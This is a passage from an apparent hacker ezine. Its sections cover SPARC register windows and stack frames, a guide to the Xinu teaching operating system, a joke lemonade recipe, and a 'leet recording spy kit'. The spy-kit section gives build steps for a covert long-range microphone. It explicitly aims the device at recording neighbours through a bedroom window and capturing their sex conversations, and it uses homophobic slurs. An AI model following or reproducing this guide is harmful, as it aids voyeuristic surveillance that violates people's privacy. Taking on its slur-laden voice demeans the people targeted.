the called procedure. Because of this, the memory traffic is lowered when
going up and down the procedure call. Because this is a frequent operation
the performance is improved.
That is atleast the basic idea.
Here's a table illustrating the overlap of registers (taken from Peter Magnuss
on):
register group mnemonic register address
~~~~~~~~~~~~~~ ~~~~~~~~ ~~~~~~~~~~~~~~~~
global %g0-%g7 r[0]-r[7]
out %o0-%o7 r[8]-r[15]
local %l0-%l7 r[16]-r[23]
in %i0-%i7 r[24]-r[31]
Here you are able to see an implementation with 8 windows, numbered 0 to
7 ("w0" to "w7" in the table). Each window coincide to 24 registers, 16 of
these are shared with other windows. Windows are arranged so like, window
#0 borders #7. The usual cause of changing the topical window as pointed to
by the Current Window Pointer, is the RESTORE and SAVE instructions that
you can see in the middle. More rare is the supoervisor RETT instruction
(return from trap) & the trap event (interrupt, exception, or the TRAP
instruction).
-----------------------------------------
Figure (sparcwin.gif):
-----------------------------------------
In the top of the left of the figure, the "WIM" register is indicated.
The Window Invalid Mask is a bit map of valid windows. It's used as
a pointer, ie. exactly one bit is set in the WIM register, which
indicates which window is invalid. In our figure (also taken from
Peter's homepage, along with a lot of info, thx) it's window 7.
Register windows are used to support procedure calls, so they could
be looked at as a cache of the stack contents. The Window Invalid Mask
(WIM) pointer indicates the number of how many procedure calls in a row
can be taken without writing out data to the memory. In our figure
the capacity of the register windows is fully utilized. Another
potentional call will therefore exceed it's capacity and trigger a
window overflow trap. A window underflow trap occurs when the register
window cache at the other end is empty and more data has to be fetched
from memory.
That's it. Props for the article goes to Peter for being the resource
of nearly everything here. This is basically my own way of expressing
it all, no m4d 0d4y inph0z, sorry - just some good old useful txt
you can't get too much of.
Just for the hell of it, i've added some ascii of the typical layout of
the sparc stack frame here:
low addresses
+-------------------------+
%sp --> | 16 words for storing |
| LOCAL and IN registers |
+-------------------------+
| one-word pointer to |
| aggregate return value |
+-------------------------+
| 6 words for callee |
| to store register |
| arguments |
+-------------------------+
| outgoing parameters |
| past the 6th, if any |
+-------------------------+
| space, if needed, for |
| compiler temporaries |
| and saved floating- |
| point registers |
+-------------------------+
+-------------------------+
| space dynamically |
| allocated via the |
| alloca() library call |
+-------------------------+
| space, if needed, for |
| automatic arrays, |
| aggregates, and |
| addressable scalar |
| automatics |
+-------------------------+
%fp -->
high addresses
Should be fairly self-explanatory...
Additional Sparc resources you may want to look into about sparc asm:
URLs:
[1] http://www.xgc.com/manuals/m1750-ada/xgc-ada-gdb/x3398.html
[2] http://www.users.qwest.net/~eballen1/
[3] http://docs.sun.com/?q=assembly
Books:
[1] SPARC Architecture, Assembly Language Programming, and C (2nd Edition)
Richard P. Paul
ISBN: 0130255963
[2] SPARC Assembly Language Reference Manual (Solaris 8)
Sun Microsystems, Inc
ISBN: 1400522803
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x07] How to build a leet recording spy kits .x[wolfinux].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
through out this article, i'll be referring by
"leet recording spy kit" (or lrsk(c)) to an inexpensive
home made audio spying system.
the idea is to have a box, with your favorite audio
recorder, capable of capturing clean sounds over 50 yards
without having the signal headroom bottlenecked by proximity
noises.
(why? might get you some pussy.)
first, the most sensitive types of microphones are condensors
which uses a double layered capacitor mechanism to convert
air waves into electric signals.
first thing you need is a the super mic.o-O
1) pass by a perchman at lunch break, and steal his shotgun
^-- elite
2) get leet and build your own
^-- gay(more suitable for this issue)
MICROPHONE CIRCUIT SCHEMATIC
R1
-----------*------/\/\/\------*------------
| | | + | +
| | | |
| --- --- ===
| C1 ^ C2 ^ B1 - 9V
| ===== ===== ===
| === === |
| = = |
| |
| =====
| ===
| =
|
|
|
\ | Signal
\------------------------------------------------>
Ground
MIKE /------------------------------------------------>
/ |
|
|
|
=====
===
= Ground
this is a pressure zone mic (PZM)
in a perfect world, this would be the simplest explanation of the
circuitry envolved.
B1 is a 9V battery with two leads.
C1 is 0.1 uF ceramic monolithic capacitor mounted as close as possible to
the microphone element terminals. This capacitor primarily functions to
limited radio frequency (RF) interference. The circuit will work without
it but it will be more susceptible to RF.
MICROPHONE ELEMENT - Any small electret condenser microphone element should work.
RadioShack got one with a fairly uniform frequency response for about $3 US
R1 is a 3.3k, ~1/8watt, carbon film resistor.
This part will deal with the amperage in the circuit.
next thing we need is audio cables
don't go gayass-cheap on this item!! or you'll get ground loops and RF interference
all over!
get a decent 3-conductor cable (Canare kicks ass)
for the plug, you need an XLR (? & ?)
it goes like this:
pin 1 ---> signal (-)
pin 2 ---> signal (+)
pin 3 ---> ground
rosin-core solder is recommended for soldering the connections.
and remember if you cross link 1 and 2, you'll have a 6db reduction
due to mis-phased signal. (crossing 1 and 3 will be unshielded, but mostly okay)
now, having meticulously mounted the microphone element, and the circuit parts
-=<now let's build the microphone a house>=-
you need a plastic diner plate (25 cm wide) and drill a tiny (0.5 cm) hole
about 3 cm off the center.
turn the plate, and mount the microphone element through the hole you made
and duck tape it.
the 9v power supply should be well stabilised also.
now turn back the plate, and apply a plastic food wrap layer over it.
(this is mostly humid proofing, or else you will have static hushes after
the first night of neighbour MILF stalking)<---h0h0h0 :/
next thing you need is 2 plastic flower pots.one big enough to house the little one.
cut the base of the smaller one, and mount your plate on top of it, duck tape it.
drill a hole in down the bigger pot's base, to pass the audio cable through.
-=<you're alomst done>=-
house the little pot inside the big one.
and cover the top with a cotton/polly cloth or a piece of clean foam.
and your lrsk(c) will look something like:
foam --> ________________________
/| |\
big pot -------> | |
| |
| |
| |
| \___ * ________/ |
| | | | |
pressure zone cabinet-------> | | |
| | | | |
baby pot --------> | | | |
| | | | |
|____|___|_________|___|
|
|
audio cable ---> |____________________~
the last part is choosing your recording media.
since you have a +48 DC (phantom powered mic)
and I'm assuming you got not pre amplifier at home
that handles it, i say you might need a DI converter.
a DI (direct inject box) is a little piece of hardawre
that converts your mic audio signal to line audio signal.
you can find those from BSS, Behringer products, but I say
for your neighbourhood espionnage, let's go for something
cheaper.
You can find a little plug converter, powered by a 1.5 AA
in most of music stores, guitar shops, electronics...
that looks something like this:
tip ---> /\
--
ring ---> | |
|--|
| |
sleeve ---> | |
| |
| |
-------
| |
| |
power supply----> | |
| |
|_______|
| ? ? ? |
female XLR ---> | ? ? ? |
|_^_^_^_|
this is a typical converter, with a TRS 1/4" jack plug.
now you need an audio appliance with a Jack input.
that could be a Hi Fi stereo system, a DVD player with
karaoke mic input, a guitar amplifier...
or better your sound card (since you want to save your
neighbour's sex convos)
what you need is to camouflage your lrsk(c) and point it
to the MILF bedroom window.
(PS: if done with care, this PZM mic will capt sounds
at amazing distances. and keep in mind that the audio cable
length should be less than 15 meters)
---===<<<<<lrsk(c)>>>===---
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Table of contents:
[1] - Compiling and running source code
[2] - Architecture details
[3] - Outro, Credits, Shoutz, Resources & Fin
The version that will be described in this article is 7.0. I don't think anyon
e
will ever be able to use any of this stuff, so it will be strictly educational
for the specially interested [if you dont care about rare o/s'es just skip the
section, no one will be forcing you to read].
Xinu OS is made by Sun. Xinu is an educational system.
[1] - Compiling and running source code
Here I will describe how to compile and run programs on an Xinu system.
You use the tool 'xcc' to compile programs, and 'getxinu' to run the output.
These tools are located in ~xinu/bin.
Here is some Xinu source code that will just print some text and exit:
#include <conf.h>
main()
{
printf("zippa dee doo dah\n");
}
To compile/link the program type:
xcc zippa.c
Somethings to note about the Xinu compiler xcc is that it behaves nearly identic
to gcc, except 2 parameters behaving paranormally compared to the standard gcc
usage.
Then, if there are no problems occuring, an executable image will be created
in the file a.out. Use the getxinu command to run this on the system like this:
getxinu a.out
(type 'getxinu -m xxx a.out' to specy a specific xinu machine to run, where xx
x = the
specific machine)
On Xinu networks usually if there is no free Xinu machines the user will be
queued and have to wait till a machine is unused. To stop waiting, you can type 'q'
to quit or 's' to see how the queue status. When a machine is available you will see a
msg printed reporting which machine you are assigned to and you are connected
to that very machine and get the console. The remaining stuff is to load and run
the Xinu program, a.out. We have to put the machine in a state where the PROM
monitor has control.
Press RETURN a few times to check this. When the monitor is running it
will answer with it's prompt '>'. If otherwise the machine is running someone
elses
leftover Xinu program or it has crashed. Type '\b' to send a BREAK which will
cause
the machine to stop whatever it is doing and return the monitor. Now you can
usually load the xinu program and run by issuing the proper boot command to the
monitor:
ble() yourlogin/progname
(progname = a.out)
You will see something like this:
Xinu Version 7.0 SUN3
620795 bytes real mem
43404 bytes Xinu code
clock enabled
zippa dee doo dah
All user processes have completed.
[2] - Architecture Details
Now, type \q to quit the getxinu, let's go on looking at some architecture det
ails
showing how the xinu sys uses the motorola 68010/68020 processors. These proce
ssors
are standard 32-bit processors. 68010 registers can move or operate data which
is
located in these registers or the memory can also receive interrupts from exte
rnal
source and the alike. The 68000 series processors differentiate between regist
ers
that hold data and the registers that keep addresses. There is 8 data register
s
referred to as 'd0' thru 'd7', 7 standard address registers ('a0' thru 'a6') a
nd
the special stack address register, which is a7. Also there is a status reg. (
sr)
and the program counter (pc).
As your xinu k0d3 is booted the machine is placed in supervisor mode.
When it's booted xinu never puts the machine in user mode as it is operating,
i.e
source code is always ran in supervisor mode, therefore you can access the sys
tem
byte of the status register, which is 16 bits wide. Lower 8 bits are the user
byte
and their interpretations are shown in this very table taken from ugrad.cs.ubc
.ca:
Bit Meaning
=============-=====
0 Carry Flag
1 Overflow Flag
2 Zero Flag
3 Negative Flag
4 Extend Flag
5-7 Not Used
Status Register User Byte
User byte just containts arithmetic flags. The upper bits (system byte) shown
HERE:
Bit Meaning
==========================
0-2 Interrupt Level Mask
3-4 Not Used
5 Supervisor Mode Flag
6 Not Used
7 Trace Mode Flag
Status Register System Byte
Usage of the the supervisor mode bit is to control if the processor is in supe
rvisor
mode or not (over bit 1 means supervisor mode as bit = 1 --> supervisor mode)
while
the "trace mode" acts alike.
In a "trace mode", a "trace exception" is created as an effect of each instruc
tion that
is excited. First 3 bits are used to make an interrupt priorty level which is
interpreted
as a number 0 thru 7.
If the level is set to N all the interrupts that is not greater than N will be
ignored.
[3] - Various other information
- the source for routines are in the dir ~xinu/xinu.sun3/src/sys/sys and the h
eader
files in ~xinu/xinu.sun3/src/sys/h.
- use the xcc parameter -S to generate assembly code for your application.
- format of xinu stack frame:
+-----------------------+
SP | |
+-----------------------+
(-n*4) | local variable n |
+-----------------------+
. .
. .
. .
+-----------------------+
(-8) | local variable 2 |
+-----------------------+
(-4) | local variable 1 |
+-----------------------+
A6 | old A6 |
+-----------------------+
(+4) | return address |
+-----------------------+
(+8) | parameter 1 |
+-----------------------+
(+12) | parameter 2 |
+-----------------------+
. .
. .
. .
+-----------------------+
(+n*4+4) | parameter n |
+-----------------------+
during the execution of a process at any time it's stack consits of those stac
k
frames piled end to end with the sp pointing just under the local variables of
the
active stack frame. stack ascii from ugrad.cs.ubc.ca.
[3] - Outro, Credits, Shoutz, Resources & Fin
All in all Xinu is a fine operating system with it's threads and micro kernel
architecture which makes it fitted for embedded applications. It even has a TC
P/IP
stack! Even though, I doubt the xinu o/s is going to take over the IT world, h
eh.
Remember, you probably won't be able to do anything with this information, it'
s cool
learning. Thanks to ugrad.cs.ubc.ca for the being the resource of 99% of the i
nfo,
so thanks to Peter Phillips, Graeme Clark, Terry Coatta, and Barry Brachman. S
houtz
goes to all cool people on the eris free network that know me.
URLs:
[1] http://www.sci.csuhayward.edu/~billard/cs4560/node21.html
[2] http://www.cs.purdue.edu/homes/brylow/xinu/
Also you should grab the book "Internetworking with TCP/IP", which uses Xinu (
if anyone
really cares). That's it.
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x09] Making the Perfect Summertime Lemonade .x[t.Transient]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
// Making the Perfect Summertime Lemonade
// t.Transient (bill@microsoft.com)
********** DISCLAIMER **************
!!!!!!READ AT YOUR OWN RISK!!!!!!!!!
I nor b4b0 take responsibility for
the contents within! If you squirt
lemon juice in yer eye, it's yer
own fault. Also, this is only 0day
until around September; then autumn
comes and everything changes.
Also, Kraft Foods(TM) wants you to
know this about Kool-Aid(TM)(R)(C):
http://www.kraftfoods.com/koolAid/ka_privacy.html
'0h J34h!' may or may not be Copyright(C)
Kraft Foods, Inc. (Notice their use of a
'K' to simulate 1337sp34k. Phagz.).
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
************************************
Ok folks, listen up. I'm going to say this once, and only
once. I don't have time to be schooling you kids all day.
I have things to do. Follow my instructions and you'll
have the *perfect* summertime lemonade. Deviate and...
well.. you won't. Expert haqrs only!
** STEP ONE: GO TO THE STORE
A crucial step. Not getting to the store can mean
not getting a packet of lemonade flavored Kool-Aid(TM),
which is what you need if you're going to pull this
off. ++++++++NEWBIE NOTE: If a huge-ass pitcher
with a face on it busts through the wall and yells:
------------------------------------------------------------
root@blackdove~# sysvbanner OH JEA\!\!\!@#$
####### # #
# # # #
# # # #
# # #######
# # # #
# # # #
####### # #
# ####### # ### ### ### ##### # # #####
# # # # ### ### ### # # # # # # #
# # # # ### ### ### # ### # ####### # #
# ##### # # # # # # # # # # # #####
# # # ####### # #### ####### # #
# # # # # ### ### ### # # # # # #
##### ####### # # ### ### ### ##### # # #####
root@blackdove~#
------------------------------------------------------------
don't be alarmed. This happens all the time. THe crazy bastard
appears everywhere incessantly. Just walk away and ignore him;
leading him on only makes things worse.
ANYWAYS..............
** STEP TWO: GO BACK TO YOUR HOUSE.
Assuming that you have a house. Chances are you live in an
apartment with your mom, or all by yourself. Watever, that
works. Just go back to where you came from.
** STEP THREE: GET A BIG-ASSED GLASS THING
In the midwest they're called 'pitchers'. Dunno what you commies
in NY and CA call em... as for those of you outside the States,
I won't even venture or bother to assume. Go find a big glass
container, clear out all the dead bugs (since you haven't used
it since last summer), and pour HALF of the powder into it.....
I SAID HALF.......
..... HALF == 1/2 == .5.
** STEP FOUR: JUST ADD WATER
If you're in a communist nation (ie. Canada, or France), water
might be rationed out. If you're in America, it's plentiful and you
can just flip open your thingie on the sink and fill up the glass
container us cowboys call a 'pitcher'. Fill it up until it's 3/4
of the way full.
** STEP FIVE: Add Kool-Aid(TM)
Put the rest of the Kool-Aid(TM) in the pitcher with the water
and the first dose of Kool-Aid(TM). Stir with a wooden spoon
(the same kind that your mom used to beat you with).
LISTEN TO ME VERY CAREFULLY: Let this sit for 10 minutes.
Add a squirt of lemon juice from a real lemon. Add THREE
cubes of ice.
** STEP SIX: 0H J34H!!!!#@$
Drink it.
- 0day from t.Transient
Property of b4b0
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
______________________________________/\\\__________________________
\/\\\
\/\\\
____ __/\\\\\\\\___/\\/\\\\\\_ ____ \/\\\__ _____ _____ __
___ /\\\/////\\\_\/\\\////\\\___ /\\\\\\\\\ _____ _____ ___
/\\\\\\\\\\\ \/\\\ \//\\\ /\\\////\\\
\//\\/////// \/\\\ \/\\\ \/\\\ \/\\\
_________\//\\\\\\\\\\_\/\\\___\/\\\_\//\\\\\\\/\\__________________
\////////// \/// \/// \///////\//
___________________________________/\\\\\___________________________
/\\\///
/\\\
____ _____ ____/\\\\\ ___/\\\\\\\\\___ _____ _____ ____
____ ____ ____ /\\\///\\\__\////\\\// ____ _____ _____
/\\\__\//\\\ \/\\\
\//\\\__/\\\ \/\\\
______________________\///\\\\\/______\/\\\_________________________
\///// \///
___________________/\\\\\\\___________________________/\\\__________
/\\\/////\\\ \/\\\
/\\\ \//\\\ \/\\\
/\\/\\\\\\\__\/\\\ \/\\\ /\\\\\\\\\ \/\\\
___ \/\\\/////\\\_\/\\\ ___\/\\\_\////////\\\ ___ /\\\\\\\\\__ __
___ \/\\\ _\/// _\/\\\___ \/\\\ _ /\\\\\\\\\\___/\\\////\\\ __
\/\\\ \//\\\____/\\\ /\\\/////\\\ \/\\\__\/\\\
\/\\\ \///\\\\\\\/ \//\\\\\\\\/\\ \//\\\\\\\/\\
\/// \/////// \////////\// \///////\//
____________________________________________________________________